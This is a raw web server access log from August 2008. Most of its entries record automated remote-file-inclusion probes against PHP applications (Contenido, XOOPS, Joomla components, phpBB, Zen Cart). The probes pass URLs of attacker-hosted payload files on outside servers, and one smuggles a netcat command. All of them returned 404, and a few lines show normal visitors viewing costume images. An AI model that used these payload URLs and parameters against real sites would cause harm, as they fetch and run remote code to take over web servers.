77.90.20.2 - - [07/Aug/2008:08:23:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:27 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:28 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:30 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:33 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:33 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:33 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:39 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:39 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:45 -0500] "GET /logs/access_log.1214784000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:08:23:45 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:08:23:48 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:08:24:25 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:08:24:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:08:24:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:24:33 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:24:34 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.9.233.10 - - [07/Aug/2008:08:24:38 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:08:24:38 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:08:25:16 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:25:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:25:29 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:25:34 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.133.102.211 - - [07/Aug/2008:08:25:54 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:25:54 -0500] "GET /logs/access_log.1212278400//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:25:55 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.806"
212.97.132.101 - - [07/Aug/2008:08:28:02 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 331 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:08:28:02 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 331 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:08:28:03 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 326 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:08:28:03 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 326 "-""libwww-perl/5.53"
72.248.189.215 - - [07/Aug/2008:08:28:34 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:08:28:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:08:28:35 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.7.108.165 - - [07/Aug/2008:08:29:55 -0500] "GET /logs//admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
207.7.108.165 - - [07/Aug/2008:08:29:55 -0500] "GET //admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
72.248.189.215 - - [07/Aug/2008:08:30:57 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:08:31:14 -0500] "GET /logs//admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:08:31:15 -0500] "GET //admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:08:32:12 -0500] "GET /logs/access_log.1213315200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
220.110.178.66 - - [07/Aug/2008:08:32:20 -0500] "GET /logs//admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
72.248.189.215 - - [07/Aug/2008:08:32:20 -0500] "GET /logs/access_log.1213142400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
220.110.178.66 - - [07/Aug/2008:08:32:20 -0500] "GET //admin/login.php?absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
89.171.112.121 - - [07/Aug/2008:08:32:34 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
89.171.112.121 - - [07/Aug/2008:08:32:36 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.171.112.121 - - [07/Aug/2008:08:32:36 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.9.233.10 - - [07/Aug/2008:08:32:49 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:08:32:49 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
87.101.4.49 - - [07/Aug/2008:08:32:54 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:08:32:54 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
77.90.20.2 - - [07/Aug/2008:08:32:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:33:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
213.168.176.11 - - [07/Aug/2008:08:34:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.technologydecisions.net/form_mail/var.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
213.168.176.11 - - [07/Aug/2008:08:34:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.technologydecisions.net/form_mail/var.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
212.158.144.193 - - [07/Aug/2008:08:34:20 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://gotika.webpark.cz/cesky/X_01_01.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.90.20.2 - - [07/Aug/2008:08:34:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
212.158.144.193 - - [07/Aug/2008:08:34:25 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:26 -0500] "GET /costume/costm15.jpg HTTP/1.0" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:26 -0500] "GET /costume/costm14.jpg HTTP/1.0" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:26 -0500] "GET /costume/costm13.jpg HTTP/1.0" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:26 -0500] "GET /costume/costm16.jpg HTTP/1.0" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:27 -0500] "GET /costume/costm17.jpg HTTP/1.0" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:27 -0500] "GET /costume/costm18.jpg HTTP/1.0" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:28 -0500] "GET /costume/costm19.jpg HTTP/1.0" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.90.20.2 - - [07/Aug/2008:08:34:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
212.158.144.193 - - [07/Aug/2008:08:34:29 -0500] "GET /costume/costm21.jpg HTTP/1.0" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:29 -0500] "GET /costume/costm22.jpg HTTP/1.0" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:30 -0500] "GET /costume/costm23.jpg HTTP/1.0" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:30 -0500] "GET /costume/costm24.jpg HTTP/1.0" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.158.144.193 - - [07/Aug/2008:08:34:32 -0500] "GET /costume/costm20.jpg HTTP/1.0" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.90.20.2 - - [07/Aug/2008:08:34:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:34:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:35:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:08:36:03 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:08:36:03 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
77.90.20.2 - - [07/Aug/2008:08:36:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:36:47 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:37:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:37:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:37:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:37:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.206.238.35 - - [07/Aug/2008:08:37:39 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:08:37:39 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:08:37:39 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
87.101.4.49 - - [07/Aug/2008:08:38:12 -0500] "GET /logs/access_log.1213142400//phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:08:38:12 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:08:38:13 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
72.55.148.240 - - [07/Aug/2008:08:38:37 -0500] "GET /modules/My_eGallery/index.php?basepath=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt%0D? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.90.20.2 - - [07/Aug/2008:08:38:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:38:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
67.18.151.242 - - [07/Aug/2008:08:39:43 -0500] "GET /logs/access_log.1213142400/joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:39:44 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:39:49 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
72.55.148.240 - - [07/Aug/2008:08:40:01 -0500] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt%0D? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.55.148.240 - - [07/Aug/2008:08:40:01 -0500] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.199.244.42 - - [07/Aug/2008:08:41:59 -0500] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 293 "-""Advanced Browser (http://www.avantbrowser.com)"
66.199.244.42 - - [07/Aug/2008:08:41:59 -0500] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 298 "-""Advanced Browser (http://www.avantbrowser.com)"
85.25.146.28 - - [07/Aug/2008:08:43:55 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 323 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
85.25.146.28 - - [07/Aug/2008:08:43:56 -0500] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
85.25.146.28 - - [07/Aug/2008:08:43:56 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 318 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
85.25.146.28 - - [07/Aug/2008:08:43:56 -0500] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
72.55.133.37 - - [07/Aug/2008:08:45:00 -0500] "GET /logs//s_browse.inc.php?DOCUMENT_ROOT=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [07/Aug/2008:08:45:00 -0500] "GET //s_browse.inc.php?DOCUMENT_ROOT=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
151.11.24.250 - - [07/Aug/2008:08:45:06 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.purpleplanet.com/dds.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
151.11.24.250 - - [07/Aug/2008:08:45:07 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.purpleplanet.com/dds.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
